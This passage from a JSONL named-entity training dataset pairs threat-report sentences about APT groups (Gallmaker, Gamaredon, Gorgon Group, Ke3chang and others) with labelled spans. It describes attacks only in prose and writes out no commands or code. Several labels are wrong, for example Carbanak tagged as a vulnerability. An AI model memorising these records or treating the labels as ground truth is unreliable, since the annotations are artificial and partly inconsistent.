261]], "TOOL: PowerShell": [[266, 276]]}, "info": {"id": "dnrti_train_000381", "source": "dnrti_train"}} {"text": "The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Gallmaker": [[41, 50]]}, "info": {"id": "dnrti_train_000382", "source": "dnrti_train"}} {"text": "Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools .", "spans": {"THREAT_ACTOR: Gallmaker": [[13, 22]], "TOOL: LotL": [[87, 91]], "TOOL: publicly available hack tools": [[104, 133]]}, "info": {"id": "dnrti_train_000383", "source": "dnrti_train"}} {"text": "Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]]}, "info": {"id": "dnrti_train_000384", "source": "dnrti_train"}} {"text": "Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper .", "spans": {"THREAT_ACTOR: CopyKittens": [[15, 26]], "ORGANIZATION: Facebook": [[40, 48]]}, "info": {"id": "dnrti_train_000386", "source": "dnrti_train"}} {"text": "Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]], "ORGANIZATION: defense sectors": [[113, 128]]}, "info": {"id": "dnrti_train_000387", "source": "dnrti_train"}} {"text": "Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]], "ORGANIZATION: embassies": [[25, 34]]}, "info": {"id": "dnrti_train_000388", "source": "dnrti_train"}} {"text": "There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker 
is specifically targeting the defense , military , and government sectors .", "spans": {"THREAT_ACTOR: Gallmaker": [[106, 115]], "ORGANIZATION: government sectors": [[171, 189]]}, "info": {"id": "dnrti_train_000389", "source": "dnrti_train"}} {"text": "The group has carried out attacks most months since December 2017 .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_000390", "source": "dnrti_train"}} {"text": "Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 .", "spans": {}, "info": {"id": "dnrti_train_000391", "source": "dnrti_train"}} {"text": "The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect .", "spans": {"THREAT_ACTOR: Gallmaker": [[14, 23]], "TOOL: LotL": [[55, 59]], "TOOL: publicly available hack tools": [[72, 101]]}, "info": {"id": "dnrti_train_000392", "source": "dnrti_train"}} {"text": "The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[4, 19]], "ORGANIZATION: dynamic DNS providers": [[65, 86]], "ORGANIZATION: hosting providers": [[167, 184]], "TOOL: custom-built malware": [[205, 225]]}, "info": {"id": "dnrti_train_000393", "source": "dnrti_train"}} {"text": "Gallmaker may well have continued to avoid detection were it not for Symantec 's technology .", "spans": {"THREAT_ACTOR: Gallmaker": [[0, 9]], "ORGANIZATION: Symantec": [[69, 77]]}, "info": {"id": "dnrti_train_000394", "source": "dnrti_train"}} {"text": "In this instance , Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious , leading to the discovery of this new campaign .", "spans": {"ORGANIZATION: Symantec": [[19, 27]], "TOOL: PowerShell commands": [[52, 71]], 
"THREAT_ACTOR: Gallmaker": [[80, 89]]}, "info": {"id": "dnrti_train_000395", "source": "dnrti_train"}} {"text": "Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected .", "spans": {"ORGANIZATION: Symantec": [[8, 16]], "THREAT_ACTOR: Gallmaker": [[53, 62]]}, "info": {"id": "dnrti_train_000396", "source": "dnrti_train"}} {"text": "Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment .", "spans": {"ORGANIZATION: LookingGlass": [[13, 25]]}, "info": {"id": "dnrti_train_000397", "source": "dnrti_train"}} {"text": "The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro .", "spans": {"THREAT_ACTOR: threat group": [[107, 119]], "THREAT_ACTOR: Gamaredon": [[150, 159]], "ORGANIZATION: Symantec": [[172, 180]], "ORGANIZATION: Trend Micro": [[185, 196]]}, "info": {"id": "dnrti_train_000398", "source": "dnrti_train"}} {"text": "The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system .", "spans": {"TOOL: wget": [[27, 31]]}, "info": {"id": "dnrti_train_000399", "source": "dnrti_train"}} {"text": "The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system .", "spans": {"TOOL: VNC": [[48, 51]]}, "info": {"id": "dnrti_train_000401", "source": "dnrti_train"}} {"text": "While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved away from applications like wget , Remote Manipulator Tool , VNC and ChkFlsh.exe .", "spans": {"TOOL: batch scripts": [[49, 62]], "TOOL: SFX files": [[67, 76]], "THREAT_ACTOR: Gamaredon Group": 
[[83, 98]], "TOOL: wget": [[137, 141]], "TOOL: Remote Manipulator Tool": [[144, 167]], "TOOL: VNC": [[170, 173]], "TOOL: ChkFlsh.exe": [[178, 189]]}, "info": {"id": "dnrti_train_000402", "source": "dnrti_train"}} {"text": "The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government .", "spans": {"THREAT_ACTOR: threat group": [[4, 16]]}, "info": {"id": "dnrti_train_000403", "source": "dnrti_train"}} {"text": "Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon .", "spans": {"THREAT_ACTOR: Gamaredon": [[127, 136]]}, "info": {"id": "dnrti_train_000404", "source": "dnrti_train"}} {"text": "Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns .", "spans": {"ORGANIZATION: Palo Alto Networks": [[30, 48]], "ORGANIZATION: WildFire": [[62, 70]]}, "info": {"id": "dnrti_train_000405", "source": "dnrti_train"}} {"text": "Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights .", "spans": {"ORGANIZATION: Kaspersky Lab": [[52, 65]], "THREAT_ACTOR: Metel": [[149, 154]], "THREAT_ACTOR: GCMAN": [[159, 164]], "THREAT_ACTOR: Carbanak group": [[194, 208]]}, "info": {"id": "dnrti_train_000407", "source": "dnrti_train"}} {"text": "In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups .", "spans": {"ORGANIZATION: Kaspersky Lab": [[10, 23]], "THREAT_ACTOR: groups": [[131, 137]]}, "info": {"id": "dnrti_train_000408", "source": "dnrti_train"}} {"text": 
"Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "THREAT_ACTOR: attack groups": [[133, 146]]}, "info": {"id": "dnrti_train_000409", "source": "dnrti_train"}} {"text": "In all , Kaspersky Lab discovered Metel in more than 30 financial institutions .", "spans": {"ORGANIZATION: Kaspersky Lab": [[9, 22]], "THREAT_ACTOR: Metel": [[34, 39]], "ORGANIZATION: financial institutions": [[56, 78]]}, "info": {"id": "dnrti_train_000410", "source": "dnrti_train"}} {"text": "It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware .", "spans": {"ORGANIZATION: financial institutions": [[72, 94]], "TOOL: Metel malware": [[152, 165]]}, "info": {"id": "dnrti_train_000411", "source": "dnrti_train"}} {"text": "A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services .", "spans": {"THREAT_ACTOR: group": [[9, 14]], "THREAT_ACTOR: GCMAN": [[31, 36]], "THREAT_ACTOR: Metel Group": [[154, 165]], "ORGANIZATION: banking institutions": [[176, 196]]}, "info": {"id": "dnrti_train_000412", "source": "dnrti_train"}} {"text": "Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks .", "spans": {"THREAT_ACTOR: attackers": [[37, 46]]}, "info": {"id": "dnrti_train_000413", "source": "dnrti_train"}} {"text": "Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement .", "spans": {"THREAT_ACTOR: GCMAN group": [[30, 41]], "TOOL: Putty": [[96, 101]], "TOOL: 
VNC": [[104, 107]], "TOOL: Meterpreter": [[114, 125]]}, "info": {"id": "dnrti_train_000414", "source": "dnrti_train"}} {"text": "During that time they poked 70 internal hosts , compromised 56 accounts , making their way from 139 attack sources ( TOR and compromised home routers ) .", "spans": {}, "info": {"id": "dnrti_train_000417", "source": "dnrti_train"}} {"text": "Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "ORGANIZATION: financial institutions": [[50, 72]], "TOOL: GCMAN malware": [[111, 124]]}, "info": {"id": "dnrti_train_000419", "source": "dnrti_train"}} {"text": "In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": {"VULNERABILITY: Carbanak": [[29, 37]], "ORGANIZATION: financial institution": [[68, 89]]}, "info": {"id": "dnrti_train_000420", "source": "dnrti_train"}} {"text": "Recently Subaat drew our attention due to renewed targeted attack activity .", "spans": {"THREAT_ACTOR: Subaat": [[9, 15]]}, "info": {"id": "dnrti_train_000421", "source": "dnrti_train"}} {"text": "Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group .", "spans": {"THREAT_ACTOR: actors": [[85, 91]], "ORGANIZATION: 360": [[122, 125]], "ORGANIZATION: Tuisec": [[130, 136]], "THREAT_ACTOR: group": [[195, 200]], "THREAT_ACTOR: attackers": [[204, 213]], "ORGANIZATION: Unit 42": [[214, 221]], "THREAT_ACTOR: Gorgon Group": [[276, 288]]}, "info": {"id": "dnrti_train_000422", "source": "dnrti_train"}} {"text": "Starting in February 2018 , Palo Alto Networks identified a campaign of 
attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Palo Alto Networks": [[28, 46]], "THREAT_ACTOR: Gorgon Group": [[104, 116]], "ORGANIZATION: governmental organizations": [[127, 153]]}, "info": {"id": "dnrti_train_000423", "source": "dnrti_train"}} {"text": "Starting in February 2018 , Palo Alto Networks Unit 42 identified a", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[28, 54]]}, "info": {"id": "dnrti_train_000424", "source": "dnrti_train"}} {"text": "of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"THREAT_ACTOR: Gorgon Group": [[35, 47]], "ORGANIZATION: governmental organizations": [[58, 84]]}, "info": {"id": "dnrti_train_000425", "source": "dnrti_train"}} {"text": "The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": {"THREAT_ACTOR: GCMAN group": [[4, 15]], "ORGANIZATION: budgeting": [[64, 73]], "ORGANIZATION: accounting departments": [[78, 100]]}, "info": {"id": "dnrti_train_000426", "source": "dnrti_train"}} {"text": "Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Unit 42": [[28, 35]], "THREAT_ACTOR: Gorgon Group": [[93, 105]], "ORGANIZATION: governmental organizations": [[116, 142]]}, "info": {"id": "dnrti_train_000427", "source": "dnrti_train"}} {"text": "APT38 's increasingly aggressive targeting against banks .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]]}, "info": {"id": "dnrti_train_000428", "source": "dnrti_train"}} {"text": "APT38 has paralleled North Korea 's worsening 
financial condition .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]]}, "info": {"id": "dnrti_train_000431", "source": "dnrti_train"}} {"text": "On much of the C2 infrastructure we identified several crimeware family samples .", "spans": {}, "info": {"id": "dnrti_train_000432", "source": "dnrti_train"}} {"text": "While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns .", "spans": {"THREAT_ACTOR: Gorgon Group": [[86, 98]], "ORGANIZATION: Unit 42": [[101, 108]], "THREAT_ACTOR: Gorgon Group 's actors": [[178, 200]]}, "info": {"id": "dnrti_train_000433", "source": "dnrti_train"}} {"text": "360 and Tuisec already identified some Gorgon Group members .", "spans": {"ORGANIZATION: 360": [[0, 3]], "ORGANIZATION: Tuisec": [[8, 14]], "THREAT_ACTOR: Gorgon Group": [[39, 51]], "ORGANIZATION: members": [[52, 59]]}, "info": {"id": "dnrti_train_000434", "source": "dnrti_train"}} {"text": "RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks .", "spans": {"TOOL: RATs": [[0, 4]], "TOOL: NjRat": [[13, 18]], "TOOL: Lokibot": [[41, 48]]}, "info": {"id": "dnrti_train_000435", "source": "dnrti_train"}} {"text": "it 's not known if the attackers physically reside in Pakistan .", "spans": {"THREAT_ACTOR: attackers": [[23, 32]]}, "info": {"id": "dnrti_train_000436", "source": "dnrti_train"}} {"text": "While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]], "THREAT_ACTOR: Gorgon Group": [[86, 98]]}, "info": {"id": "dnrti_train_000438", "source": "dnrti_train"}} {"text": "Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure 
leveraged by Gorgon Group for criminal and targeted attacks .", "spans": {"ORGANIZATION: Unit 42": [[27, 34]], "THREAT_ACTOR: Gorgon Group": [[146, 158]]}, "info": {"id": "dnrti_train_000439", "source": "dnrti_train"}} {"text": "Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: Gorgon Group": [[39, 51]]}, "info": {"id": "dnrti_train_000440", "source": "dnrti_train"}} {"text": "As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks .", "spans": {"ORGANIZATION: Unit 42": [[31, 38]], "THREAT_ACTOR: Gorgon Group": [[117, 129]], "TOOL: shared infrastructure": [[140, 161]]}, "info": {"id": "dnrti_train_000441", "source": "dnrti_train"}} {"text": "The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs .", "spans": {"TOOL: domain infrastructure": [[83, 104]]}, "info": {"id": "dnrti_train_000442", "source": "dnrti_train"}} {"text": "One interesting note about the criminal activity of Gorgon Group is their usage of Bitly .", "spans": {"THREAT_ACTOR: Gorgon Group": [[52, 64]], "TOOL: Bitly": [[83, 88]]}, "info": {"id": "dnrti_train_000443", "source": "dnrti_train"}} {"text": "Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": {}, "info": {"id": "dnrti_train_000444", "source": "dnrti_train"}} {"text": "Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains .", "spans": {"THREAT_ACTOR: Gorgon Group": [[44, 56]], "TOOL: Bitly": [[67, 72]]}, "info": {"id": "dnrti_train_000445", "source": "dnrti_train"}} {"text": "Beginning 
in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": {"ORGANIZATION: Unit 42": [[32, 39]], "ORGANIZATION: government agencies": [[119, 138]]}, "info": {"id": "dnrti_train_000446", "source": "dnrti_train"}} {"text": "Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April .", "spans": {"TOOL: Bitly": [[45, 50]], "THREAT_ACTOR: Gorgon Group": [[73, 85]]}, "info": {"id": "dnrti_train_000447", "source": "dnrti_train"}} {"text": "As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan .", "spans": {"THREAT_ACTOR: Gorgon Group": [[57, 69]], "ORGANIZATION: governmental organizations": [[112, 138]]}, "info": {"id": "dnrti_train_000448", "source": "dnrti_train"}} {"text": "Starting in mid-February .", "spans": {}, "info": {"id": "dnrti_train_000449", "source": "dnrti_train"}} {"text": "Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations .", "spans": {"THREAT_ACTOR: Gorgon Group": [[45, 57]], "TOOL: shared infrastructure": [[146, 167]]}, "info": {"id": "dnrti_train_000450", "source": "dnrti_train"}} {"text": "Unit 42 researchers have been tracking an active campaign .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]]}, "info": {"id": "dnrti_train_000451", "source": "dnrti_train"}} {"text": "Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": {"ORGANIZATION: Unit 42": [[32, 39]], "ORGANIZATION: government agencies": [[123, 142]]}, "info": {"id": "dnrti_train_000453", "source": "dnrti_train"}} {"text": "Like all of 
Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group .", "spans": {"THREAT_ACTOR: Gorgon Group": [[12, 24], [137, 149]], "TOOL: infrastructure utilization": [[66, 92]], "TOOL: standardization": [[97, 112]]}, "info": {"id": "dnrti_train_000454", "source": "dnrti_train"}} {"text": "Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan .", "spans": {"THREAT_ACTOR: Gorgon Group": [[60, 72]]}, "info": {"id": "dnrti_train_000455", "source": "dnrti_train"}} {"text": "Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks .", "spans": {"THREAT_ACTOR: Gorgon Group": [[0, 12]], "THREAT_ACTOR: actor group": [[29, 40]]}, "info": {"id": "dnrti_train_000456", "source": "dnrti_train"}} {"text": "Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work .", "spans": {"THREAT_ACTOR: Gorgon Group": [[52, 64]]}, "info": {"id": "dnrti_train_000457", "source": "dnrti_train"}} {"text": "On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor .", "spans": {"ORGANIZATION: Advanced Threat Research": [[16, 40]], "TOOL: SYSCON backdoor": [[92, 107]]}, "info": {"id": "dnrti_train_000458", "source": "dnrti_train"}} {"text": "The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": {"TOOL: Word document": [[20, 33]], "MALWARE: manual.doc": [[34, 44]], "THREAT_ACTOR: Honeybee": [[114, 122]]}, "info": {"id": "dnrti_train_000459", "source": "dnrti_train"}} {"text": "While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks .", "spans": 
{"THREAT_ACTOR: Gorgon Group": [[6, 18]]}, "info": {"id": "dnrti_train_000460", "source": "dnrti_train"}} {"text": "This key was also used in the Honeybee campaign and appears to have been used since August 2017 .", "spans": {}, "info": {"id": "dnrti_train_000462", "source": "dnrti_train"}} {"text": "Several additional documents surfaced between January 17 and February 3 .", "spans": {}, "info": {"id": "dnrti_train_000463", "source": "dnrti_train"}} {"text": "Some of the malicious documents were test files without the implant .", "spans": {"TOOL: test files": [[37, 47]]}, "info": {"id": "dnrti_train_000465", "source": "dnrti_train"}} {"text": "From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea .", "spans": {"THREAT_ACTOR: Honeybee": [[20, 28]]}, "info": {"id": "dnrti_train_000466", "source": "dnrti_train"}} {"text": "Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {"THREAT_ACTOR: Honeybee": [[0, 8]]}, "info": {"id": "dnrti_train_000467", "source": "dnrti_train"}} {"text": "Honeybee appears to target humanitarian aid and inter-Korean affairs .", "spans": {"THREAT_ACTOR: Honeybee": [[0, 8]]}, "info": {"id": "dnrti_train_000468", "source": "dnrti_train"}} {"text": "McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]], "TOOL: SYSCON backdoor": [[202, 217]]}, "info": {"id": "dnrti_train_000469", "source": "dnrti_train"}} {"text": "Large-scale cyber espionage campaigns such as \" GhostNet \" .", "spans": {}, "info": {"id": "dnrti_train_000470", "source": "dnrti_train"}} {"text": "As the crisis in Syria escalates , FireEye researchers have discovered a cyber 
espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"ORGANIZATION: FireEye": [[35, 42]], "THREAT_ACTOR: Ke3chang": [[116, 124]]}, "info": {"id": "dnrti_train_000471", "source": "dnrti_train"}} {"text": "As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"ORGANIZATION: FireEye": [[35, 42]], "THREAT_ACTOR: threat group": [[73, 85]], "THREAT_ACTOR: Ke3chang": [[104, 112]]}, "info": {"id": "dnrti_train_000472", "source": "dnrti_train"}} {"text": "We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 .", "spans": {"THREAT_ACTOR: Ke3chang": [[20, 28]], "THREAT_ACTOR: attackers": [[29, 38]]}, "info": {"id": "dnrti_train_000473", "source": "dnrti_train"}} {"text": "FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: command-and-control": [[47, 66]], "TOOL: CnC": [[69, 72]], "THREAT_ACTOR: Ke3chang actor": [[99, 113]]}, "info": {"id": "dnrti_train_000474", "source": "dnrti_train"}} {"text": "Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and exfiltration .", "spans": {}, "info": {"id": "dnrti_train_000475", "source": "dnrti_train"}} {"text": "The Ke3chang attackers have been active since at least 2010 .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "THREAT_ACTOR: attackers": [[13, 22]]}, "info": {"id": "dnrti_train_000476", "source": "dnrti_train"}} {"text": "traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", 
"spans": {"ORGANIZATION: mining sectors": [[127, 141]]}, "info": {"id": "dnrti_train_000477", "source": "dnrti_train"}} {"text": "The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "ORGANIZATION: mining sectors": [[193, 207]]}, "info": {"id": "dnrti_train_000478", "source": "dnrti_train"}} {"text": "August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers .", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "THREAT_ACTOR: Ke3chang": [[90, 98]], "THREAT_ACTOR: attackers": [[99, 108]]}, "info": {"id": "dnrti_train_000479", "source": "dnrti_train"}} {"text": "In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs .", "spans": {}, "info": {"id": "dnrti_train_000480", "source": "dnrti_train"}} {"text": "Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" .", "spans": {"THREAT_ACTOR: Ke3chang": [[21, 29]], "THREAT_ACTOR: attackers": [[30, 39]], "TOOL: BS2005": [[90, 96]], "TOOL: BMW": [[103, 106]], "TOOL: MyWeb": [[117, 122]]}, "info": {"id": "dnrti_train_000484", "source": "dnrti_train"}} {"text": "it is a typical first stage backdoor commonly found in APT attacks .", "spans": {}, "info": {"id": "dnrti_train_000485", "source": "dnrti_train"}} {"text": "The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: mining sectors": [[198, 212]]}, "info": {"id": "dnrti_train_000486", "source": 
"dnrti_train"}} {"text": "All of the CnC communications are performed over the HTTP protocol .", "spans": {"TOOL: HTTP protocol": [[53, 66]]}, "info": {"id": "dnrti_train_000487", "source": "dnrti_train"}} {"text": "The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between .", "spans": {"TOOL: BS2005 malware": [[44, 58]], "TOOL: BMW": [[109, 112]], "TOOL: MyWeb malware": [[131, 144]]}, "info": {"id": "dnrti_train_000488", "source": "dnrti_train"}} {"text": "A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication .", "spans": {"TOOL: IWebBrowser2 COM": [[78, 94]]}, "info": {"id": "dnrti_train_000489", "source": "dnrti_train"}} {"text": "Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" .", "spans": {"ORGANIZATION: FireEye": [[49, 56]]}, "info": {"id": "dnrti_train_000490", "source": "dnrti_train"}} {"text": "Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm .", "spans": {"ORGANIZATION: FireEye DTI": [[27, 38]], "ORGANIZATION: FireEye": [[47, 54]], "THREAT_ACTOR: Ke3chang": [[69, 77]]}, "info": {"id": "dnrti_train_000491", "source": "dnrti_train"}} {"text": "The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "THREAT_ACTOR: attackers": [[13, 22]], "TOOL: MyWeb": [[40, 45]]}, "info": {"id": "dnrti_train_000492", "source": "dnrti_train"}} {"text": "The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "THREAT_ACTOR: attackers": [[13, 22]], "TOOL: MyWeb malware": [[38, 51]]}, "info": {"id": "dnrti_train_000493", "source": 
"dnrti_train"}} {"text": "During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[87, 116]], "ORGANIZATION: FireEye": [[129, 136]], "THREAT_ACTOR: Ke3chang": [[157, 165]]}, "info": {"id": "dnrti_train_000494", "source": "dnrti_train"}} {"text": "The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 .", "spans": {"TOOL: MyWeb sample": [[4, 16]], "ORGANIZATION: FireEye": [[22, 29]]}, "info": {"id": "dnrti_train_000495", "source": "dnrti_train"}} {"text": "At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group .", "spans": {"THREAT_ACTOR: group": [[154, 159]]}, "info": {"id": "dnrti_train_000496", "source": "dnrti_train"}} {"text": "MyWeb is the second-generation malware used by Ke3chang .", "spans": {"TOOL: MyWeb": [[0, 5]], "THREAT_ACTOR: Ke3chang": [[47, 55]]}, "info": {"id": "dnrti_train_000497", "source": "dnrti_train"}} {"text": "ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[0, 29]], "THREAT_ACTOR: threat actor": [[80, 92]], "THREAT_ACTOR: Ke3chang": [[101, 109]]}, "info": {"id": "dnrti_train_000498", "source": "dnrti_train"}} {"text": "This attack used the crisis in Syria as a lure to deliver malware to its targets .", "spans": {}, "info": {"id": "dnrti_train_000499", "source": "dnrti_train"}} {"text": "Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor .", "spans": {"THREAT_ACTOR: Ke3chang": [[49, 57]], 
"THREAT_ACTOR: APT group": [[58, 67]], "ORGANIZATION: ESET": [[70, 74]], "THREAT_ACTOR: group": [[150, 155]]}, "info": {"id": "dnrti_train_000500", "source": "dnrti_train"}} {"text": "Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past .", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "THREAT_ACTOR: Ke3chang": [[65, 73]], "THREAT_ACTOR: attackers": [[74, 83]], "ORGANIZATION: G20 meetings": [[158, 170]]}, "info": {"id": "dnrti_train_000501", "source": "dnrti_train"}} {"text": "During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks .", "spans": {"ORGANIZATION: FireEye": [[75, 82]], "THREAT_ACTOR: Ke3chang": [[96, 104]]}, "info": {"id": "dnrti_train_000502", "source": "dnrti_train"}} {"text": "Ke3chang attackers are operating within China .", "spans": {"THREAT_ACTOR: Ke3chang": [[0, 8]], "THREAT_ACTOR: attackers": [[9, 18]]}, "info": {"id": "dnrti_train_000503", "source": "dnrti_train"}} {"text": "In May 2017 , 